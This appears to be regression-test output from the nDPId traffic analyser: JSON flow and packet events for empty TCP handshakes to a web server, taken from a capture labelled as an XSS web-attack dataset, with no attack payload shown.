-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348030687,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348030687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gAJAAD4GRc6sEAABwKgKMomkAFDF6nYHAAAAAKACchCh2wAAAgQFtAQCCAoBPPYFAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":2,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiaQ\/ByIUxep2CKAScSB2PwAAAgQFtAQCCAoD5sd5ATz2BQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":3,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gANAAD4GRdWsEAABwKgKMomkAFDF6nYIPwciFYAQAOUVRwAAAQEICgE89gUD5sd5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348033296,"flow_last_seen":1499348033296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348033296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1499348033296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LtJAAD4Glv6sEAABwKgKMom+AFA+iNZDAAAAAKACchDGWwAAAgQFtAQCCAoBPPiRAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8830,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":2,"flow_last_seen":1499348033297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033297,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQib4da6BXPojWRKAScSA7jAAAAgQFtAQCCAoD5soFATz4kQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":3,"flow_last_seen":1499348033297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348033297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LtNAAD4GlwWsEAABwKgKMom+AFA+iNZEHWugWIAQAOXakwAAAQEICgE8+JED5soF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348034569,"flow_last_seen":1499348034569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348034569,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1499348034569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z7RAAD4G9husEAABwKgKMonMAFCoJTZ7AAAAAKACchD7OgAAAgQFtAQCCAoBPPnPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":2,"flow_last_seen":1499348034569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiczTsUb+qCU2fKAScSASQAAAAgQFtAQCCAoD5stDATz5zwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":3,"flow_last_seen":1499348034570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348034570,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z7VAAD4G9iKsEAABwKgKMonMAFCoJTZ807FG\/4AQAOWxRgAAAQEICgE8+dAD5stD"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348037175,"flow_last_seen":1499348037175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348037175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1499348037175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MahAAD4GlCisEAABwKgKMonmAFDKJM3zAAAAAKACchA\/HQAAAgQFtAQCCAoBPPxbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":2,"flow_last_seen":1499348037175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiebQGLVtyiTN9KAScSDovwAAAgQFtAQCCAoD5s3PATz8WwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":3,"flow_last_seen":1499348037176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348037176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MalAAD4GlC+sEAABwKgKMonmAFDKJM300Bi1boAQAOWHxwAAAQEICgE8\/FsD5s3P"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348038438,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348038438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/dAAD4GNdmsEAABwKgKMon0AFAYNXJgAAAAAKACchBLVgAAAgQFtAQCCAoBPP2XAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":2,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQifSSwJxVGDVyYaAScSBKLgAAAgQFtAQCCAoD5s8KATz9lwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":3,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/hAAD4GNeCsEAABwKgKMon0AFAYNXJhksCcVoAQAOXpNQAAAQEICgE8\/ZcD5s8K"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348041088,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348041088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l85AAD4GLgKsEAABwKgKMooOAFBaWpfjAAAAAKACchDg\/QAAAgQFtAQCCAoBPQAtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8895,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":2,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQig7ecTfrWlqX5KAScSD19wAAAgQFtAQCCAoD5tGhAT0ALQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":3,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l89AAD4GLgmsEAABwKgKMooOAFBaWpfk3nE37IAQAOWU\/wAAAQEICgE9AC0D5tGh"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348042384,"flow_last_seen":1499348042384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348042384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1499348042384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rjZAAD4GF5qsEAABwKgKMoocAFClJq9HAAAAAKACchB9ewAAAgQFtAQCCAoBPQFxAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":2,"flow_last_seen":1499348042384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQihw9by\/zpSavSKAScSA6LAAAAgQFtAQCCAoD5tLlAT0BcQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":3,"flow_last_seen":1499348042385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348042385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rjdAAD4GF6GsEAABwKgKMoocAFClJq9IPW8v9IAQAOXZMwAAAQEICgE9AXED5tLl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348043670,"flow_last_seen":1499348043670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348043670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1499348043670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cMNAAD4GVQ2sEAABwKgKMooqAFAsTnJwAAAAAKACchAx2wAAAgQFtAQCCAoBPQKzAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":2,"flow_last_seen":1499348043670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiirQJ1Z6LE5ycaAScSA0CwAAAgQFtAQCCAoD5tQmAT0CswEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":3,"flow_last_seen":1499348043671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348043671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cMRAAD4GVRSsEAABwKgKMooqAFAsTnJx0CdWe4AQAOXTEgAAAQEICgE9ArMD5tQm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348046262,"flow_last_seen":1499348046262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348046262,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1499348046262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bZhAAD4GWDisEAABwKgKMopEAFAJXWijAAAAAKACchBb9wAAAgQFtAQCCAoBPQU7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8934,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":2,"flow_last_seen":1499348046262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQikQJGz7wCV1opKAScSA6NQAAAgQFtAQCCAoD5tavAT0FOwEDAwc="} 